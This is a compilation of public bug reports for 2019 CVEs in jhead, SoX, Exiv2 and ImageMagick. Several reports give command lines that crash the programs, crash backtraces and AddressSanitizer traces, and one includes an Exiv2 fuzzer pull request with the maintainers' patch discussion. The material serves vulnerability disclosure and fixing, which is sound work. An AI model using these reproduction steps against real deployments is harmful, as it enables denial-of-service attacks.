jhead 3.03 is affected by: Buffer Overflow. The impact is: Denial of service. The component is: gpsinfo.c Line 151 ProcessGpsInfo(). The attack vector is: Open a specially crafted JPEG file.

Description Jianzhong Liu 2019-02-22 10:34:29 UTC

Created attachment 1537431 \[details\]
Input triggering the bug

Description of problem: 
Some inputs may trigger a stack buffer overflow in jhead.

Version-Release number of selected component (if applicable):
jhead-3.03

How reproducible:
Stable

Steps to Reproduce:
1. Run jhead with the attached input

Actual results:
Running with default settings:

jhead SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Extraneous 11 padding bytes before section E1

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Extraneous 12 padding bytes before section E1

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegally sized Exif subdirectory (229 entries)

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Extraneous 10 padding bytes before section E1

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegal number format 35 for tag 0000 in Exif

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Too many components 2013278224 for tag 0000 in Exif

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegal number format 16 for tag 5132 in Exif

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegal GPS directory link in Exif

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegal number format 16 for Exif gps tag 002a

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Illegal number format 69 for Exif gps tag 0004

Nonfatal Error : 'SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash' Inappropriate format (11) for Exif GPS coordinates!
\*\*\* buffer overflow detected \*\*\*: jhead terminated
======= Backtrace: =========
/lib64/libc.so.6(\_\_fortify\_fail+0x37)\[0x7f0c7ae239e7\]
/lib64/libc.so.6(+0x115b62)\[0x7f0c7ae21b62\]
/lib64/libc.so.6(+0x11506b)\[0x7f0c7ae2106b\]
/lib64/libc.so.6(+0x506ba)\[0x7f0c7ad5c6ba\]
/lib64/libc.so.6(\_IO\_vfprintf+0x4ed7)\[0x7f0c7ad59357\]
/lib64/libc.so.6(\_\_vsprintf\_chk+0x88)\[0x7f0c7ae210f8\]
/lib64/libc.so.6(\_\_sprintf\_chk+0x7d)\[0x7f0c7ae2104d\]
jhead\[0x408e1b\]
jhead\[0x406fb5\]
jhead\[0x4071e3\]
jhead\[0x40465b\]
jhead\[0x4047ed\]
jhead\[0x402b5e\]
jhead\[0x4017e4\]
/lib64/libc.so.6(\_\_libc\_start\_main+0xf5)\[0x7f0c7ad2e3d5\]
jhead\[0x402270\]
======= Memory map: ========
00400000-00410000 r-xp 00000000 08:01 3543787                            /usr/bin/jhead
00610000-00611000 r--p 00010000 08:01 3543787                            /usr/bin/jhead
00611000-00612000 rw-p 00011000 08:01 3543787                            /usr/bin/jhead
00612000-00617000 rw-p 00000000 00:00 0
01630000-01651000 rw-p 00000000 00:00 0                                  \[heap\]
7f0c7aaf6000-7f0c7ab0b000 r-xp 00000000 08:01 3286373                    /usr/lib64/libgcc\_s-4.8.5-20150702.so.1
7f0c7ab0b000-7f0c7ad0a000 ---p 00015000 08:01 3286373                    /usr/lib64/libgcc\_s-4.8.5-20150702.so.1
7f0c7ad0a000-7f0c7ad0b000 r--p 00014000 08:01 3286373                    /usr/lib64/libgcc\_s-4.8.5-20150702.so.1
7f0c7ad0b000-7f0c7ad0c000 rw-p 00015000 08:01 3286373                    /usr/lib64/libgcc\_s-4.8.5-20150702.so.1
7f0c7ad0c000-7f0c7aece000 r-xp 00000000 08:01 3286326                    /usr/lib64/libc-2.17.so
7f0c7aece000-7f0c7b0ce000 ---p 001c2000 08:01 3286326                    /usr/lib64/libc-2.17.so
7f0c7b0ce000-7f0c7b0d2000 r--p 001c2000 08:01 3286326                    /usr/lib64/libc-2.17.so
7f0c7b0d2000-7f0c7b0d4000 rw-p 001c6000 08:01 3286326                    /usr/lib64/libc-2.17.so
7f0c7b0d4000-7f0c7b0d9000 rw-p 00000000 00:00 0
7f0c7b0d9000-7f0c7b1da000 r-xp 00000000 08:01 3286440                    /usr/lib64/libm-2.17.so
7f0c7b1da000-7f0c7b3d9000 ---p 00101000 08:01 3286440                    /usr/lib64/libm-2.17.so
7f0c7b3d9000-7f0c7b3da000 r--p 00100000 08:01 3286440                    /usr/lib64/libm-2.17.so
7f0c7b3da000-7f0c7b3db000 rw-p 00101000 08:01 3286440                    /usr/lib64/libm-2.17.so
7f0c7b3db000-7f0c7b3fd000 r-xp 00000000 08:01 3286302                    /usr/lib64/ld-2.17.so
7f0c7b5f5000-7f0c7b5f8000 rw-p 00000000 00:00 0
7f0c7b5f9000-7f0c7b5fc000 rw-p 00000000 00:00 0
7f0c7b5fc000-7f0c7b5fd000 r--p 00021000 08:01 3286302                    /usr/lib64/ld-2.17.so
7f0c7b5fd000-7f0c7b5fe000 rw-p 00022000 08:01 3286302                    /usr/lib64/ld-2.17.so
7f0c7b5fe000-7f0c7b5ff000 rw-p 00000000 00:00 0
7ffc6e3ac000-7ffc6e3cd000 rw-p 00000000 00:00 0                          \[stack\]
7ffc6e3df000-7ffc6e3e2000 r--p 00000000 00:00 0                          \[vvar\]
7ffc6e3e2000-7ffc6e3e4000 r-xp 00000000 00:00 0                          \[vdso\]
\[1\]    172 abort (core dumped)  jhead SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash

Stack backtrace according to gdb:

#0  0x00007f0c7ad42207 in \_\_GI\_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:55
#1  0x00007f0c7ad438f8 in \_\_GI\_abort () at abort.c:90
#2  0x00007f0c7ad84d27 in \_\_libc\_message (do\_abort=do\_abort@entry=2,
    fmt=fmt@entry=0x7f0c7ae95312 "\*\*\* %s \*\*\*: %s terminated\\n") at ../sysdeps/unix/sysv/linux/libc\_fatal.c:196
#3  0x00007f0c7ae239e7 in \_\_GI\_\_\_fortify\_fail (msg=msg@entry=0x7f0c7ae952b8 "buffer overflow detected")
    at fortify\_fail.c:30
#4  0x00007f0c7ae21b62 in \_\_GI\_\_\_chk\_fail () at chk\_fail.c:28
#5  0x00007f0c7ae2106b in \_IO\_str\_chk\_overflow (fp=<optimized out>, c=<optimized out>) at vsprintf\_chk.c:31
#6  0x00007f0c7ad5c6ba in \_\_GI\_\_\_printf\_fp\_l (fp=fp@entry=0x7ffc6e3c4670, loc=<optimized out>,
    info=info@entry=0x7ffc6e3c41e0, args=args@entry=0x7ffc6e3c41c0) at printf\_fp.c:1235
#7  0x00007f0c7ad5c799 in \_\_\_printf\_fp (fp=fp@entry=0x7ffc6e3c4670, info=info@entry=0x7ffc6e3c41e0,
    args=args@entry=0x7ffc6e3c41c0) at printf\_fp.c:1256
#8  0x00007f0c7ad59357 in \_IO\_vfprintf\_internal (s=s@entry=0x7ffc6e3c4670, format=<optimized out>,
    format@entry=0x7ffc6e3c48e0 "%9.6fd %9.6fm %9.6fs", ap=ap@entry=0x7ffc6e3c47a8) at vfprintf.c:1634
#9  0x00007f0c7ae210f8 in \_\_\_vsprintf\_chk (
    s=0x7ffc6e3c4900 "10399825331313022575963351482892288.000000d  0.00\\003c\\001", flags=1, slen=50,
    format=0x7ffc6e3c48e0 "%9.6fd %9.6fm %9.6fs", args=args@entry=0x7ffc6e3c47a8) at vsprintf\_chk.c:83
#10 0x00007f0c7ae2104d in \_\_\_sprintf\_chk (
    s=s@entry=0x7ffc6e3c4900 "10399825331313022575963351482892288.000000d  0.00\\003c\\001", flags=flags@entry=1,
    slen=slen@entry=50, format=format@entry=0x7ffc6e3c48e0 "%9.6fd %9.6fm %9.6fs") at sprintf\_chk.c:32
#11 0x0000000000408e1b in sprintf (\_\_fmt=0x7ffc6e3c48e0 "%9.6fd %9.6fm %9.6fs",
    \_\_s=0x7ffc6e3c4900 "10399825331313022575963351482892288.000000d  0.00\\003c\\001") at /usr/include/bits/stdio2.h:33
#12 ProcessGpsInfo (DirStart=<optimized out>, OffsetBase=OffsetBase@entry=0x1630308 "II\*",
    ExifLength=ExifLength@entry=2135) at gpsinfo.c:151
#13 0x0000000000406fb5 in ProcessExifDir (DirStart=0x1630318 "E", OffsetBase=OffsetBase@entry=0x1630308 "II\*",
    ExifLength=ExifLength@entry=2135, NestingLevel=NestingLevel@entry=0) at exif.c:866
#14 0x00000000004071e3 in process\_EXIF (ExifSection=ExifSection@entry=0x1630300 "\\b\_Exif", length=length@entry=2143)
    at exif.c:1041
#15 0x000000000040465b in ReadJpegSections (infile=infile@entry=0x1630070, ReadMode=ReadMode@entry=READ\_METADATA)
    at jpgfile.c:287
#16 0x00000000004047ed in ReadJpegFile (
    FileName=FileName@entry=0x7ffc6e3cc8f5 "SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash", ReadMode=READ\_METADATA)
    at jpgfile.c:375
#17 0x0000000000402b5e in ProcessFile (FileName=0x7ffc6e3cc8f5 "SBO\_gpsinfo.c:150:17\_asan\_plain\_nocrash")
    at jhead.c:905
#18 0x00000000004017e4 in main (argc=<optimized out>, argv=0x7ffc6e3cbd58) at jhead.c:1757

Expected results:
Not applicable

Additional info:

Comment 1 Adrian Reber 2019-02-25 07:19:59 UTC

Have you contacted upstream about it? That would make more sense than reporting it here.

Comment 2 Jianzhong Liu 2019-02-26 02:34:35 UTC

(In reply to Adrian Reber from comment #1)
\> Have you contacted upstream about it? That would make more sense than
> reporting it here.

I have sent the author an email regarding this bug, but the author has been unresponsive.

Comment 4 Adrian Reber 2019-08-05 15:15:54 UTC

(In reply to Ludovic Rousseau from comment #3)
\> The upstream author is not very responsive.
> Also jhead is a good example of an unsecure parser for a complex format. I
> would not be surprised if more bugs are found.
> 
> For Debian I fixed this bug in
> https://salsa.debian.org/debian/jhead/commit/
> bf330c777cc911b9f8509ffec7458952789c81e2

Thanks for pointing me to your patches. I will use them in the next jhead builds.

Comment 9 Fedora Update System 2019-08-14 01:05:27 UTC

jhead-3.03-4.fc30 has been pushed to the Fedora 30 stable repository. If problems still persist, please make note of it in this bug report.

Comment 10 Fedora Update System 2019-08-14 01:42:05 UTC

jhead-3.03-4.fc29 has been pushed to the Fedora 29 stable repository. If problems still persist, please make note of it in this bug report.

CVE-2019-1010301: 1679952 – Stack buffer overflow in gpsinfo.c when running jhead

An issue was discovered in libsox.a in SoX 14.4.2. In sox-fmt.h (startread function), there is an integer overflow on the result of integer addition (wraparound to 0) fed into the lsx_calloc macro that wraps malloc. When a NULL pointer is returned, it is used without a prior check that it is a valid pointer, leading to a NULL pointer dereference on lsx_readbuf in formats_i.c.

There are 2 issues here:  
1\. In sox-fmt.c function startread, there is no check on the value passed to the value of comment\_bytes. If the value of comment\_bytes is on the boundary of overflow, it results in "comment\_bytes + 1" to be 0, hence calling lsx\_calloc will give null pointer.  
2\. Further, there is no check that this returned buffer can be null. Passing the null buffer down the line will trigger a segmentation fault when the program tried to use the buffer to store the result of fread (in formats\_i.c on function lsx\_readbuf).

Attached is a sample of the input file. The command to trigger the bug is --single-threaded <file> -t aiff /dev/null channels 1 rate 16k fade 3 norm. An information about the binary: 32 bit, limited to 800MB memory, under Linux Ubuntu 16.04, compiled with libmad only.</file>

The output of SoX with -V -V enabled:  
time: Oct 3 2018 08:02:13  
uname: <removed> #178-Ubuntu SMP Tue Jun 11 08:30:22 UTC 2019 x86\_64  
compiler: gcc 4.2.1 Compatible Clang 7.0.0 (branches/release\_70)  
arch: 1248 48 44 L </removed>

CVE-2019-13590: SoX - Sound eXchange / Bugs

There is an out-of-bounds read in Exiv2::MrwImage::readMetadata in mrwimage.cpp in Exiv2 through 0.27.2.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 37 Commits 1 Checks 0 Files changed

**Conversation**

This commit places the basics for libFuzzer integration with one  
fuzzer which fuzzes the readMetadata function. The fuzzer is  
located at fuzz/read-metadata.

To add more fuzzers please add them to ./fuzz directory as  
described in the README.

Also a memory corruption bug is found using this fuzzer which  
might lead to additional bugs after fix is pushed.

Attached is the crash for the read-metadata.cpp fuzzer + screenshot of the backtrace.

I think this should also be given a CVE for a memory corruption vulnerability which affects programs that use the API to read bytes and not a file.

I'll be happy to contribute more fuzzers after this bug is fixed so it won't fail the other fuzzers.

Also, I'll be happy to contribute an integration to Fuzzit (I'm the CEO of the company) which will enable continuous fuzzing for the project for free as it's an open-source project. you can read also about systemd case study here @clanmills

Not sure who is the right person to review the PR. but CCing @kevinbackhouse as you merged a CVE bugfix lately.

Cheers,  
Yevgeny

Please could you include exact reproduction steps? What command line did you run this with?

Sure. here it is (clang >6.0 must be installed).

cd <exivdir\>
mkdir build
cd build
export CXX=clang++
export CC=clang
cmake .. -G "Unix Makefiles" "\-DCMAKE\_BUILD\_TYPE=Debug"  "\-DEXIV2\_BUILD\_FUZZ\_TESTS=ON"
make -j4
./bin/read-metadata

@yevgenypats: I cannot reproduce this on the command line:

    $ ./build/bin/exiv2 60588206-f9a14480-9d9e-11e9-981a-977e0741bb42.png 
    Exiv2 exception in print action for file 60588206-f9a14480-9d9e-11e9-981a-977e0741bb42.png:
    Failed to read image data
    

I also stepped through it in the debugger and all it does is throw an exception at mrwimage.cpp:123.

@kevinbackhouse Yes, because you tried to reproduce with exiv2 which is a bit different because it's reading from a file i.e using this api: ImageFactory::open(const std::string& path, bool useCurl) and not ImageFactory::open(const byte* data, size_t size) which is a bit different and thus not getting to the buggy function which is readMetadata.

try to reproduce by running the fuzzer with the testcase I attached ./bin/read-metadata <test_case>

This commit places the basics for libFuzzer integration with one
fuzzer which fuzzes the readMetadata function. The fuzzer is
located at fuzz/read-metadata.

To add more fuzzers please add them to ./fuzz directory as
described in the README.

Also a memory corruption bug is found using this fuzzer which
might lead to additional bugs after fix is pushed.

@kevinbackhouse Also I just push a review fix per @cryptomilk instructions so the compile line now is

mkdir build
cd build
cmake .. -G "Unix Makefiles" "\-DEXIV2\_BUILD\_FUZZ\_TESTS=ON"  "\-DCMAKE\_BUILD\_TYPE=AddressSanitizer"
make -j4
./bin/read-metadata

**D4N** requested changes Jul 4, 2019

Copy link

Member

** **D4N** left a comment**

Wow, thanks for this contribution!

However, by removing EXIV2_TEAM_USE_SANITIZERS you effectively crippled our CI pipeline to no longer run with ASAN + UBSAN. Unless this is fixed, this PR is a nogo. Fixing this will probably require some refactoring of the CMake code, please tell if you want to undertake this (we can take care of that too).

Hi Dan, Thanks:) I changed this per @cryptomilk request. I'm not sure I'm the right person to fix this as I'm not very familiar with it. I can change it backward and we can fix it in a different PR. So this pull request will only add the fuzzers. Also, would you like me to contribute another pull request so the fuzzers will run on a daily basis via Fuzzit integration? This way it may find new bugs and also catch If bugs are introduced again. Cheers, Yevgeny.

…

On Thu, Jul 4, 2019, 10:36 AM D4N \*\*\*@\*\*\*.\*\*\*> wrote: \*\*\*@\*\*\*.\*\*\*\* requested changes on this pull request. Wow, thanks for this contribution! However, by removing EXIV2\_TEAM\_USE\_SANITIZERS you effectively crippled our CI pipeline to no longer run with ASAN + UBSAN. Unless this is fixed, this PR is a nogo. Fixing this will probably require some refactoring of the CMake code, please tell if you want to undertake this (we can take care of that too). — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#943?email\_source=notifications&email\_token=AD52CDS4ZZZEBEFYE7JUSETP5WZBPA5CNFSM4H5EZH42YY3PNVWWK3TUL52HS4DFWFIHK3DMKJSXC5LFON2FEZLWNFSXPKTDN5WW2ZLOORPWSZGOB5PU2ZI#pullrequestreview-257903973>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AD52CDVPNEGL2WSEEC6Z5WDP5WZBPANCNFSM4H5EZH4Q\> .

Copy link

Member

****D4N** commented Jul 4, 2019**

Yevgeny Pats <notifications@github.com> writes:

Hi Dan, Thanks:) I changed this per @cryptomilk request. I'm not sure I'm the right person to fix this as I'm not very familiar with it. I can change it backward and we can fix it in a different PR. So this pull request will only add the fuzzers.

Could you push your previous state to another branch in your fork and post a link to that here?

Also, would you like me to contribute another pull request so the fuzzers will run on a daily basis via Fuzzit integration?

Once we merge this, why not? Before merging this, I see little benefit in that, beside cluttering my inbox ;-)

This way it may find new bugs and also catch If bugs are introduced again.

How is Fuzzit different from oss-fuzz, since I have the long term plan of getting exiv2 into oss-fuzz.

…

Cheers, Yevgeny. On Thu, Jul 4, 2019, 10:36 AM D4N \*\*\*@\*\*\*.\*\*\*> wrote: > \*\*\*@\*\*\*.\*\*\*\* requested changes on this pull request. > > Wow, thanks for this contribution! > > However, by removing EXIV2\_TEAM\_USE\_SANITIZERS you effectively crippled > our CI pipeline to no longer run with ASAN + UBSAN. Unless this is fixed, > this PR is a nogo. Fixing this will probably require some refactoring of > the CMake code, please tell if you want to undertake this (we can take care > of that too). > > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub > <#943?email\_source=notifications&email\_token=AD52CDS4ZZZEBEFYE7JUSETP5WZBPA5CNFSM4H5EZH42YY3PNVWWK3TUL52HS4DFWFIHK3DMKJSXC5LFON2FEZLWNFSXPKTDN5WW2ZLOORPWSZGOB5PU2ZI#pullrequestreview-257903973>, > or mute the thread > <https://github.com/notifications/unsubscribe-auth/AD52CDVPNEGL2WSEEC6Z5WDP5WZBPANCNFSM4H5EZH4Q\> > . > -- You are receiving this because you were mentioned. Reply to this email directly or view it on GitHub: #943 (comment)

Sounds good. Will do regarding the additional PR with the link. Fuzzit has some more features that OSS currently missing like running the tests on PRs as well ( https://fuzzit.dev/2019/06/20/continuous-fuzzing-systemd-case-study/) and a bit better user management IMHO. Essentially you can use both if you want. Systemd uses both and we are working with envoy/the Google team on an integration as well so they also will use both. In my opinion you can just use Fuzzit, essentially we are running the same fuzzers. I think teams that uses both usually started with OSS fuzz and then added Fuzzit after we launched. But that's up to you. So If it's fine with you once we merge I'll open an additional PR which should be pretty straightforward as we already have the foundations for the fuzzers themselves:)

…

On Thu, Jul 4, 2019, 3:57 PM D4N \*\*\*@\*\*\*.\*\*\*> wrote: Yevgeny Pats \*\*\*@\*\*\*.\*\*\*> writes: > Hi Dan, > > Thanks:) I changed this per @cryptomilk request. I'm not sure I'm the right > person to fix this as I'm not very familiar with it. I can change it > backward and we can fix it in a different PR. So this pull request will > only add the fuzzers. Could you push your previous state to another branch in your fork and post a link to that here? > > Also, would you like me to contribute another pull request so the fuzzers > will run on a daily basis via Fuzzit integration? Once we merge this, why not? Before merging this, I see little benefit in that, beside cluttering my inbox ;-) > This way it may find new bugs and also catch If bugs are introduced > again. How is Fuzzit different from oss-fuzz, since I have the long term plan of getting exiv2 into oss-fuzz. > > Cheers, > Yevgeny. > > On Thu, Jul 4, 2019, 10:36 AM D4N \*\*\*@\*\*\*.\*\*\*> wrote: > >> \*\*\*@\*\*\*.\*\*\*\* requested changes on this pull request. >> >> Wow, thanks for this contribution! >> >> However, by removing EXIV2\_TEAM\_USE\_SANITIZERS you effectively crippled >> our CI pipeline to no longer run with ASAN + UBSAN. Unless this is fixed, >> this PR is a nogo. Fixing this will probably require some refactoring of >> the CMake code, please tell if you want to undertake this (we can take care >> of that too). >> >> — >> You are receiving this because you were mentioned. >> Reply to this email directly, view it on GitHub >> < #943?email\_source=notifications&email\_token=AD52CDS4ZZZEBEFYE7JUSETP5WZBPA5CNFSM4H5EZH42YY3PNVWWK3TUL52HS4DFWFIHK3DMKJSXC5LFON2FEZLWNFSXPKTDN5WW2ZLOORPWSZGOB5PU2ZI#pullrequestreview-257903973 >, >> or mute the thread >> < https://github.com/notifications/unsubscribe-auth/AD52CDVPNEGL2WSEEC6Z5WDP5WZBPANCNFSM4H5EZH4Q > >> . >> > > > -- > You are receiving this because you were mentioned. > Reply to this email directly or view it on GitHub: > #943 (comment) — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#943?email\_source=notifications&email\_token=AD52CDRGV3NE734S4H6OGVTP5X6UTA5CNFSM4H5EZH42YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGODZHPQZA#issuecomment-508491876>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AD52CDVX5GNQ2WV5OB7E3VDP5X6UTANCNFSM4H5EZH4Q\> .

Gentlemen:

I see you've all been busy while Alison and I have been having fun in the Baltic. Is this change in 0.27-maintenance?

This is quite a major change to introduce into v0.27.2. Can I proceed to release v0.27.2 from PR #940?

@cryptomilk @kevinbackhouse @piponazo @D4N @yevgenypats Is everybody happy about this being delayed for v0.27.3 scheduled for 2019-09-30?

Copy link

Member

****D4N** commented Jul 11, 2019**

@clanmills This PR is not for 0.27-maintenance and will probably be dropped in favor of #945.

This morning, I did a $ git pull --rebase, and code relating to this arrived on my laptop:

    690 rmills@rmillsmbp:~/gnu/github/exiv2/0.27-maintenance $ git pull --rebase
    remote: Enumerating objects: 4241, done.
    remote: Counting objects: 100% (3174/3174), done.
    remote: Compressing objects: 100% (857/857), done.
    remote: Total 2422 (delta 1843), reused 2113 (delta 1540), pack-reused 0
    Receiving objects: 100% (2422/2422), 478.72 KiB | 446.00 KiB/s, done.
    Resolving deltas: 100% (1843/1843), completed with 286 local objects.
    From https://github.com/exiv2/exiv2
       1a9bae4f..b7a97854  0.27-maintenance -> origin/0.27-maintenance
       a803ce3b..1de8e734  master           -> origin/master
    Updating 1a9bae4f..b7a97854
    Fast-forward
     src/mrwimage.cpp                        |  22 +++++++++++++++-------
     test/data/issue_943_poc1.mrm            | Bin 0 -> 37 bytes
     test/data/issue_943_poc2.mrm            | Bin 0 -> 25 bytes
     tests/bugfixes/github/test_issue_943.py |  25 +++++++++++++++++++++++++
     4 files changed, 40 insertions(+), 7 deletions(-)
     create mode 100644 test/data/issue_943_poc1.mrm
     create mode 100644 test/data/issue_943_poc2.mrm
     create mode 100644 tests/bugfixes/github/test_issue_943.py
    691 rmills@rmillsmbp:~/gnu/github/exiv2/0.27-maintenance $ 
    

I think these mrm files are minolta stuff and that's 946 and 948. Confused!

@clanmills: What you're seeing there is #946, which I targeted at 0.27-maintenance. The other fix is #944, but I forgot to target that at 0.27-maintenance when I created the PR, so it is currently targeting master instead. Would it be possible to get both #946 and #944 into v0.27.2?

We can put it into v0.27.2. However I don't like code changes between the final RC and Release.

If you feel this (and other good stuff) should go into 0.27.2, then we can do 0.27.2.3 (Release Candidate 3) this weekend, and release v0.27.2 at the end of July.

Team Exiv2 doesn't have a constitution or voting procedure because we usually agree! I'm happy to do what the team things is best!

Copy link

Member

****D4N** commented Jul 18, 2019**

Closing this as #945 has been merged.

CVE-2019-13504: Add libFuzzer integration + report bug by yevgenypats · Pull Request #943 · Exiv2/exiv2

ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error.

CVE-2019-13311: memory leaks is detected at AcquireMagickMemory · Issue #1623 · ImageMagick/ImageMagick

ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/fourier.c in ComplexImages.

**Prerequisites**

*   I have written a descriptive issue title
*   I have verified that I am using the latest version of ImageMagick
*   I have searched open and closed issues to ensure it has not already been reported

**Description**

There's a heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages.

**Steps to Reproduce**

run\_cmd:  
magick -seed 0 -treedepth 71 "(" magick:logo +repage ")" "(" magick:granite -white-threshold 0% -cycle 256 -lat 815  ")" -bordercolor rgb"("101,151,20")" -blue-primary 638,241  -print "0O." -complex multiply   tmp 

Second one also can trigger.  
cmd:  
magick -seed 0 "(" magick:logo +repage ")" "(" magick:logo +repage ")" -render -size 2872 -complex multiply -quiet   tmp 

Here's ASAN result.

    ==16842==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000a80 at pc 0x7fea5bb0c52f bp 0x7fff5c11c590 sp 0x7fff5c11c588
    READ of size 4 at 0x61e000000a80 thread T0
        #0 0x7fea5bb0c52e in ComplexImages MagickCore/fourier.c:305:45
        #1 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
        #2 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14
        #3 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
        #4 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
        #5 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
        #6 0x526f95 in MagickMain utilities/magick.c:149:10
        #7 0x5268e1 in main utilities/magick.c:180:10
        #8 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b069 in _start (install/bin/magick+0x41b069)
    
    0x61e000000a80 is located 0 bytes to the right of 2560-byte region [0x61e000000080,0x61e000000a80)
    allocated by thread T0 here:
        #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
        #1 0x7fea5bbb9666 in AcquireAlignedMemory MagickCore/memory.c:265:7
        #2 0x7fea5b910d5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
        #3 0x7fea5b8fe1c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
        #4 0x7fea5b8f5b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
        #5 0x7fea5b913f36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
        #6 0x7fea5bb0ae5d in ComplexImages MagickCore/fourier.c:250:8
        #7 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
        #8 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14
        #9 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
        #10 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
        #11 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
        #12 0x526f95 in MagickMain utilities/magick.c:149:10
        #13 0x5268e1 in main utilities/magick.c:180:10
        #14 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:45 in ComplexImages
    
    

Here's the ASAN result for second cmd

    ==16863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a0831b800 at pc 0x7f2a1747e649 bp 0x7ffd7c094350 sp 0x7ffd7c094348
    WRITE of size 4 at 0x7f2a0831b800 thread T0
        #0 0x7f2a1747e648 in ComplexImages MagickCore/fourier.c:305:18
        #1 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
        #2 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14
        #3 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
        #4 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
        #5 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
        #6 0x526f95 in MagickMain utilities/magick.c:149:10
        #7 0x5268e1 in main utilities/magick.c:180:10
        #8 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41b069 in _start (install/bin/magick+0x41b069)
    
    0x7f2a0831b800 is located 0 bytes to the right of 3686400-byte region [0x7f2a07f97800,0x7f2a0831b800)
    allocated by thread T0 here:
        #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
        #1 0x7f2a1752b666 in AcquireAlignedMemory MagickCore/memory.c:265:7
        #2 0x7f2a172746ac in OpenPixelCache MagickCore/cache.c:3728:46
        #3 0x7f2a1727a991 in GetImagePixelCache MagickCore/cache.c:1754:18
        #4 0x7f2a17280c59 in SyncImagePixelCache MagickCore/cache.c:5494:28
        #5 0x7f2a174defc1 in SetImageStorageClass MagickCore/image.c:2627:10
        #6 0x7f2a1747c4f7 in ComplexImages MagickCore/fourier.c:185:7
        #7 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22
        #8 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14
        #9 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
        #10 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5
        #11 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
        #12 0x526f95 in MagickMain utilities/magick.c:149:10
        #13 0x5268e1 in main utilities/magick.c:180:10
        #14 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:18 in ComplexImages
    
    

Thanks.

**System Configuration**

*   ImageMagick version:  
    Version: ImageMagick 7.0.8-50 Q16 x86\_64 2019-06-17 https://imagemagick.org
    
*   Environment (Operating system, version and so on):  
    Description: Ubuntu 18.04.1 LTS  
    Release: 18.04  
    Codename: bionic
    
*   Additional information:  
    CC=clang-7 CXX=clang++-7 ./configure --disable-openmp

CVE-2019-13302: heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages · Issue #1597 · ImageMagick/ImageMagick

http.c in Exiv2 through 0.27.1 allows a malicious http server to cause a denial of service (crash due to a NULL pointer dereference) by returning a crafted response that lacks a space character.

@kevinbackhouse Thanks for the reporting this and the other vulnerabilities you've found in the png and webp code.

